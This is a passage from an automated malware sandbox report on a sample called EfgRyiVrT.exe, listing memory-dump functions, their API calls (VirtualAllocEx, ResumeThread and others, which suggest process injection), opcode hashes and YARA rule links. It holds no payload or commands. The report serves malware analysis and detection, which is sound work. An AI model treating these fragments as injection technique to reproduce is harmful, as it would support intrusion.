Instruction ID: 44ae52a3f0f9df924e0e1f2d6b9d5040f34fcfb254811f4ee63b61b66a5153ab
Opcode Fuzzy Hash: 877bfd31489051f007c5c3e6c3e5d1a7853710b37603e5e7b2a6d0313e3ca6ef
Instruction Fuzzy Hash: 532125B18003499FDB10CFAAC981BEEFBF5FF48320F10842AE518A7240D7799910CBA5

Function 0175D740 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0175D7C7

Memory Dump Source

Source File: 0000000A.00000002.2426604995.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1750000_EfgRyiVrT.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 843100a5672892caab9804454f5eb1684062eebe5eaa52cca2aa249536e8b13a
Instruction ID: 8f78033510c71eed6fa4cbfe1b6e349e6697b8ab7bc54981d134d55eb77b876f
Opcode Fuzzy Hash: 843100a5672892caab9804454f5eb1684062eebe5eaa52cca2aa249536e8b13a
Instruction Fuzzy Hash: 3021B3B5900249DFDB50CFAAD984ADEFBF4EB48320F14841AE914A3350D374A954CF65

Function 0175D738 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0175D7C7

Memory Dump Source

Source File: 0000000A.00000002.2426604995.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1750000_EfgRyiVrT.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7e6cd5238d595d158821b8919584020f94db0d9fffb30c6657591e0a6a3e60c4
Instruction ID: 68bfa2a06ba7b6908ab8d6f827bf2a0cfa8ca63c75e993626f4d33d3768e131c
Opcode Fuzzy Hash: 7e6cd5238d595d158821b8919584020f94db0d9fffb30c6657591e0a6a3e60c4
Instruction Fuzzy Hash: C421E3B5901349DFDB50CFA9D984ADEFFF4EB48320F14841AE954A3250C378AA54CF60

Function 075D4B10 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 075D4B86

Memory Dump Source

Source File: 0000000A.00000002.2435654183.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75d0000_EfgRyiVrT.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1e532e51c905a9d4f0a185661ffe2ad44be8466b1be5c2ba4df18f692af4ac63
Instruction ID: 7c013a418766ae910da29ad2f4f8946af935d14e52a1b3cc99c9d6f968c89c83
Opcode Fuzzy Hash: 1e532e51c905a9d4f0a185661ffe2ad44be8466b1be5c2ba4df18f692af4ac63
Instruction Fuzzy Hash: 5C1136729003499FDF10DFAAC845BEEBBF5AF88320F14841AE919A7250C775A954CFA1

Function 075D4988 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 075D49F2

Memory Dump Source

Source File: 0000000A.00000002.2435654183.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75d0000_EfgRyiVrT.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: bf4ca570a29229188e6b7039e9ed60ea5d97a154d3ef8467d8cbda614aa7e5f6
Instruction ID: 9e6017b7c498b8cd6b5734da571264bb17a3d83bf795020807d0f83f1e950e76
Opcode Fuzzy Hash: bf4ca570a29229188e6b7039e9ed60ea5d97a154d3ef8467d8cbda614aa7e5f6
Instruction Fuzzy Hash: 1E115BB19003498FDB20DFAAD4857EEFBF5EF88324F20841AD519A7640CB756944CBA5

Function 075D4B18 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 075D4B86

Memory Dump Source

Source File: 0000000A.00000002.2435654183.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75d0000_EfgRyiVrT.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2378686ca13f0e429855eb8e5c7d857b32a099134f3d9a5728beb172e8eaaa67
Instruction ID: e368623380154577c704ca32f794ef2502c027ef39218514bd6b5f72e67256b2
Opcode Fuzzy Hash: 2378686ca13f0e429855eb8e5c7d857b32a099134f3d9a5728beb172e8eaaa67
Instruction Fuzzy Hash: D31126729003499FDF20DFAAC845BDEBBF5AF88320F148419E519A7250C775A950CFA1

Function 075D8D58 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 075D8DBD

Memory Dump Source

Source File: 0000000A.00000002.2435654183.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75d0000_EfgRyiVrT.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 75edacf710803be1e58ae4df88f343e9de56995272c9c685270e07590d009fa4
Instruction ID: 8f05e5928e9434afce39e28e98ccefc53f12bb3f129feea6d533dd92e8879135
Opcode Fuzzy Hash: 75edacf710803be1e58ae4df88f343e9de56995272c9c685270e07590d009fa4
Instruction Fuzzy Hash: 3311F5B68003499FDB10DF99D545BDEBFF8FB48720F10841AD518A7640C375A944CFA5

Function 075D4990 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 075D49F2

Memory Dump Source

Source File: 0000000A.00000002.2435654183.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75d0000_EfgRyiVrT.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 19da1a6166e4252ddbfb246b5db8e769d1bfd8963b27e49135b90da262410dac
Instruction ID: 38e811cf899561eb94ec9ba8dcffb184b975d54e8fc4c2fab83ed59ca326fc4d
Opcode Fuzzy Hash: 19da1a6166e4252ddbfb246b5db8e769d1bfd8963b27e49135b90da262410dac
Instruction Fuzzy Hash: CE113AB1D003498FDB24DFAEC4457EEFBF5AF88724F248419D519A7240CB75A940CB95

Function 075D4DE4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 075D8DBD

Memory Dump Source

Source File: 0000000A.00000002.2435654183.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75d0000_EfgRyiVrT.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 17af0258de80186e5d721daaa19ba407f60c767b849cba57644f92868ca7be98
Instruction ID: 2cf67558e71928c5d8e9b972f9c425e3a13da4901e1458fca1504229781ba09b
Opcode Fuzzy Hash: 17af0258de80186e5d721daaa19ba407f60c767b849cba57644f92868ca7be98
Instruction Fuzzy Hash: 4D11E0B58003499FDB60DF9AC985BDEBBF8FB58320F10841AE518A7240D3B5A954CFA5

Function 0175B058 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0175B0BE

Memory Dump Source

Source File: 0000000A.00000002.2426604995.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1750000_EfgRyiVrT.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5ffaece4233e24d8b0258c1cb955176ae631ab8e99332cf6c174fae597ad7f6f
Instruction ID: 1d897ff237cbd1f007c71f9f2fb18642996a5f5f24a9b56f01c7fd2992772a28
Opcode Fuzzy Hash: 5ffaece4233e24d8b0258c1cb955176ae631ab8e99332cf6c174fae597ad7f6f
Instruction Fuzzy Hash: 67110FB6C003498FDB14CF9AC544BDEFBF5AF88224F10842AD928A7200D3B9A545CFA1

Function 016FD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2426330688.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_16fd000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd7810142c09843413c6f3c3d02965657702bc2b878f1b96f748058105fb450
Instruction ID: 673669b329a5d4d2a8b99242814652d4d08056e3e935d84fc49399830fbb382a
Opcode Fuzzy Hash: 7dd7810142c09843413c6f3c3d02965657702bc2b878f1b96f748058105fb450
Instruction Fuzzy Hash: 50210676504204EFDB05DF54DDC0B6ABF65FB84324F20C16DDA0A0B256C336F456CAA1

Function 0170D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2426401720.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_170d000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48d11841c9b3119a4213e186c68290e9bd489f7f23b1d194158b7b1d5e24af14
Instruction ID: 57f94e02be19d4454c5c551040bcd119f505d1564eed2f65ca7c9ba5131481fe
Opcode Fuzzy Hash: 48d11841c9b3119a4213e186c68290e9bd489f7f23b1d194158b7b1d5e24af14
Instruction Fuzzy Hash: F7213771508300EFDB26DFD4D5C0B25FBA1FB84324F20C5ADE9094B292C776D406CA61

Function 0170D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2426401720.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_170d000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f77103e0481c5ff75b956e5fc3ef1845448b121f05033cf0c133758d334bbca6
Instruction ID: 2c4735b9f09c8875cf54bcc83d2c7fd67691b82e31e36c0529ca648eabe050c0
Opcode Fuzzy Hash: f77103e0481c5ff75b956e5fc3ef1845448b121f05033cf0c133758d334bbca6
Instruction Fuzzy Hash: 2C210375604304EFDB26DF94D9C0B26FBA5EB84314F20C5ADD90E4B292C376D406CA61

Function 016FD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2426330688.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_16fd000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: 86d2e6e84458819c98d35289fbdfe671bdbfead0bd7b7d4c97204bd9acee3de8
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 7311CDB6404280DFCB02CF44D9C0B56BF61FB84224F2482A9D9090A656C33AE456CBA2

Function 0170D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2426401720.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_170d000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: 08392473a07f23385a46e3a9412a3ce1416213a89b6d976ad81d57857e462b2e
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: 5E11BE75504384CFCB12CF54D5C4B15FBA1FB44314F24C6A9D8094B696C33AD40ACB62

Function 0170D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2426401720.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_170d000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: 1c8ceb0935045408c7c9db2003bd4a60fe040c52b16d2ad918b773b9a512a1a5
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: 9F11BB75508380DFCB12CF98C5C0B15FBA1FB84224F24C6A9D8494B6A6C33AD40ACB61

Function 016FD745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2426330688.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_16fd000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 000fe260b2c9498ed8789924d51c9b6dbfa63a033a00d9e2e2463e26eb2ed058
Instruction ID: ff6e2f7aaccf840d9d970d179c49b2f9034a27bf21c5c427705794c14cd9d640
Opcode Fuzzy Hash: 000fe260b2c9498ed8789924d51c9b6dbfa63a033a00d9e2e2463e26eb2ed058
Instruction Fuzzy Hash: 7201F2710083809AF7115EA9CD84B76BF98DF41324F18C52EEF080E296C7B9A841CAB1

Function 016FD744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2426330688.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_16fd000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3340f952b4adef951b2c3cc9334492eb41194cc3936992b6718d3eaff6e6743
Instruction ID: 0c55f85737679291c69b96f5c9fa0c829834a27128802c1bc7952bc15a867670
Opcode Fuzzy Hash: f3340f952b4adef951b2c3cc9334492eb41194cc3936992b6718d3eaff6e6743
Instruction Fuzzy Hash: B6F0C2714053849EE7118E19CDC4B62FF98EB81634F18C45AEE080E297C379A840CBB1

Analysis Process: EfgRyiVrT.exePID: 760, Parent PID: 6272COMMON

Execution Graph

Execution Coverage:	18.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	13%
Total number of Nodes:	46
Total number of Limit Nodes:	8

Executed Functions

Function 068C9548 Relevance: 3.4, APIs: 2, Instructions: 357
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 068C95E0

Memory Dump Source

Source File: 0000000E.00000002.4807965689.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_68c0000_EfgRyiVrT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e4b800c80dffaac87fbfcab336147db44d6b6f75faf7fae5a5271ceab9c4f820
Instruction ID: 42a6b1aa0454b9d31d47b19f26342a0c059d886a67c4bc65f718baa240550b12
Opcode Fuzzy Hash: e4b800c80dffaac87fbfcab336147db44d6b6f75faf7fae5a5271ceab9c4f820
Instruction Fuzzy Hash: 5DF1F674E01218CFDB54DFA9D884B9DFBB2BF88314F1482A9D808AB355DB719986CF50

Function 068C9328 Relevance: 1.8, APIs: 1, Instructions: 264
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 068C95E0

Memory Dump Source

Source File: 0000000E.00000002.4807965689.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_68c0000_EfgRyiVrT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f9f95a20f20117f23273945f155513fab558dba2e39e786866d7e987c95fae2e
Instruction ID: 6a90176a31d7d8d6f6857c995608610ea6e154979766cef7ca4abe83504cbee5
Opcode Fuzzy Hash: f9f95a20f20117f23273945f155513fab558dba2e39e786866d7e987c95fae2e
Instruction Fuzzy Hash: 5E91AF71E006188BDF69DFB9C9446ADBBF3AF88320F1485AED515E7390DB348902CB91

Function 02A4A088 Relevance: .9, Instructions: 890COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 047931b88c390b4d59df712bdd770bbbff997beda0da6fe9599cbfc783b87b4d
Instruction ID: cae4bf2fceb3a2cf537cf78380f7bac8083fc4683219dd19b4aa8d8b0db79281
Opcode Fuzzy Hash: 047931b88c390b4d59df712bdd770bbbff997beda0da6fe9599cbfc783b87b4d
Instruction Fuzzy Hash: FF826E35A40209DFCB15CFA8C594AAEBBF2FF88314F15856AE8059B366DF34E941CB50

Function 02A469A0 Relevance: .5, Instructions: 510
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 082f0e816e26a25258b2fc790953bc99f959da939add8bcc47e6c6e12e539709
Instruction ID: f834ff937e7b5c495239b4dd4308fe07a5764d18279ac8e6387514488aebfaf3
Opcode Fuzzy Hash: 082f0e816e26a25258b2fc790953bc99f959da939add8bcc47e6c6e12e539709
Instruction Fuzzy Hash: 32124970A002199FDB14DF69C894BAEBBF6BFC9700F248529E405AB395DF74D942CB90

Function 02A429EC Relevance: .4, Instructions: 359
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c93375f2fce58f7045ea202b9bb2afb89b1290d73ad28812b6c5073ef6553d35
Instruction ID: d25e54a5e20253e87e42eb6a6bf12fd7f7ac46e3bce75c89d13ba0e0c870fbca
Opcode Fuzzy Hash: c93375f2fce58f7045ea202b9bb2afb89b1290d73ad28812b6c5073ef6553d35
Instruction Fuzzy Hash: 35C1F2319082958FEB229B7888553AEBFF1AFCA204F1C85DAC9859B246DE30D50BC751

Function 02A47118 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 095c689b4584e4b2e2df0b1ea12594830c41ecdcee219cda160e8f98a99a8b40
Instruction ID: 07e505d10d31dfa135cf57e3fe8dca590ae31da875200e0f312474430ad02b17
Opcode Fuzzy Hash: 095c689b4584e4b2e2df0b1ea12594830c41ecdcee219cda160e8f98a99a8b40
Instruction Fuzzy Hash: 7EE12870A00199DFCB15CFA9DD84AADFBF2BF88304F6580A5E815AB265DF30E941CB51

Function 02A4C146 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce114bdddfd76a2f481d6600c9736e27c69a49072a6a1a3deece68d1f4e80d9f
Instruction ID: 438f567fbbefe67db069d85b77a1dc581a4e7d7eb97fb6fd5ad171055f44814b
Opcode Fuzzy Hash: ce114bdddfd76a2f481d6600c9736e27c69a49072a6a1a3deece68d1f4e80d9f
Instruction Fuzzy Hash: 3BA1D474E01218CFDB14DFAAD984A9DBBF2BF89314F1480AAE409AB365DF709945CF50

Function 02A45362 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57e76b05a66a4edf6bac357e3754c1f11fcf3859de1b99328d11ece6a7ed9448
Instruction ID: e353697745899b7aed95fb967cd9823e5e883dad2dc295bf5b4e7f9c82e0df3a
Opcode Fuzzy Hash: 57e76b05a66a4edf6bac357e3754c1f11fcf3859de1b99328d11ece6a7ed9448
Instruction Fuzzy Hash: A191B074E00218CFDB14DFAAD984A9DBBF2BF89300F549069E809BB365DB709985CF51

Function 02A4C468 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c1cea69cf12de2cdb9b584c6a8d7f1ae61d1b32887f8dda1b74b645b495240a
Instruction ID: ad51968d7d8cd1b22602ce6c3a31609d9fc840318b2726558cfeadfff450f6e1
Opcode Fuzzy Hash: 1c1cea69cf12de2cdb9b584c6a8d7f1ae61d1b32887f8dda1b74b645b495240a
Instruction Fuzzy Hash: B281B274E01218CFDB14DFAAD884A9DBBF2BF88310F14D06AE419AB365DB709985CF50

Function 02A4CA08 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 920e8c29dc8303c20f5a39d565ca0d6f4b6522fab3e786e72a3dd5b1ae05f3a2
Instruction ID: 71443d8bb92739521210b3f4e0bdb391bfd0db1c29095ec8aa9080aaa3cbd19f
Opcode Fuzzy Hash: 920e8c29dc8303c20f5a39d565ca0d6f4b6522fab3e786e72a3dd5b1ae05f3a2
Instruction Fuzzy Hash: 4881B474E01218DFEB14DFAAD884B9DBBF2BF88310F14906AD419AB365DB709985CF50

Function 02A4D278 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64ce38628952c95144bf8da0e272689e392f227e2753acf900a5a41d50e2dcf3
Instruction ID: 37b5ab55fbb6e36b2fde4f9abb5158212698e5c0236a94ae63d85d9c28e73373
Opcode Fuzzy Hash: 64ce38628952c95144bf8da0e272689e392f227e2753acf900a5a41d50e2dcf3
Instruction Fuzzy Hash: BA81A674E00618CFDB18DFAAD984B9DBBF2BF89304F149069D409AB365DB709985CF50

Function 02A4C738 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b5bf78b062442dd9941858e2a28eca92ec96005eb235cc45ba2af425fdd5d9
Instruction ID: 4b45eda1f1212ad1a6f71e630b1643042ba0d23b010372d3103042d710b51836
Opcode Fuzzy Hash: 67b5bf78b062442dd9941858e2a28eca92ec96005eb235cc45ba2af425fdd5d9
Instruction Fuzzy Hash: 5D81C474E01218DFDB14DFAAD984B9DBBF2BF88310F14806AE408AB365DB709985CF50

Function 02A4CCD8 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a800c3ca99d4dcc267429d0ee64208f700fe7ec548dbd5b45b556f3b1495e21
Instruction ID: 1598ef36ee4539c1f71a2babd63fde8a0a7b0a3fb0a6c7d30de8df92332f03f8
Opcode Fuzzy Hash: 7a800c3ca99d4dcc267429d0ee64208f700fe7ec548dbd5b45b556f3b1495e21
Instruction Fuzzy Hash: 1981C474E01218DFEB14DFAAD984B9DBBF2BF88314F14806AD409AB365DB709985CF50

Function 02A4CFAB Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36207a8a9f32b59a0fa93085b226c3ba6226b799bb1f6c943c66e3d6a4d9fe13
Instruction ID: 18430fe44586e4343144359ac1914f3363699140cbed6ed6bfe6a3de63b99dc9
Opcode Fuzzy Hash: 36207a8a9f32b59a0fa93085b226c3ba6226b799bb1f6c943c66e3d6a4d9fe13
Instruction Fuzzy Hash: B181B674E00618CFEB14DFAAD984B9DBBF2BF88300F149169D819AB365DB709985CF50

Function 02A4E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8181fa365005e4ea14a9b69b2fe26b508af028d0c819a2877f01cf7e7071f955
Instruction ID: b725302692eab2e87dca0e7b28387f48a3f1d46da7e1a1f27573e2738842827e
Opcode Fuzzy Hash: 8181fa365005e4ea14a9b69b2fe26b508af028d0c819a2877f01cf7e7071f955
Instruction Fuzzy Hash: 0A519774E00208DFEB18DFBAD584A9DBBB2FF89300F249129E915AB365DB709941CF54

Function 02A4E97B Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8897d0c485e902476d4a50640c788ddca82cbc64c070cdccfe0ec46f7cbd0f57
Instruction ID: 430a050f713df7e9991295ed5cd67cb0c7d6a524b02d78835085819089dabc81
Opcode Fuzzy Hash: 8897d0c485e902476d4a50640c788ddca82cbc64c070cdccfe0ec46f7cbd0f57
Instruction Fuzzy Hash: 2E519874E00208DFDB18DFB6D984A9DBBB2FF89300F149129E915AB365DB709941CF54

Function 068C992C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 068C9A6E

Memory Dump Source

Source File: 0000000E.00000002.4807965689.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_68c0000_EfgRyiVrT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 131abab4a0e6f77da0e5261fbdde49b600585d9b03c6009cc483705cfce02403
Instruction ID: 652b6d14fc62e5030c17a8fc33f76020609e4fc4082f54bf46ec93db7f1ccb2f
Opcode Fuzzy Hash: 131abab4a0e6f77da0e5261fbdde49b600585d9b03c6009cc483705cfce02403
Instruction Fuzzy Hash: F8112974E002199FEF44DBA8D884AADB7B5BB88324F1482A9E844E7255DB71D942CB60

Function 02A4E018 Relevance: .6, Instructions: 647
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

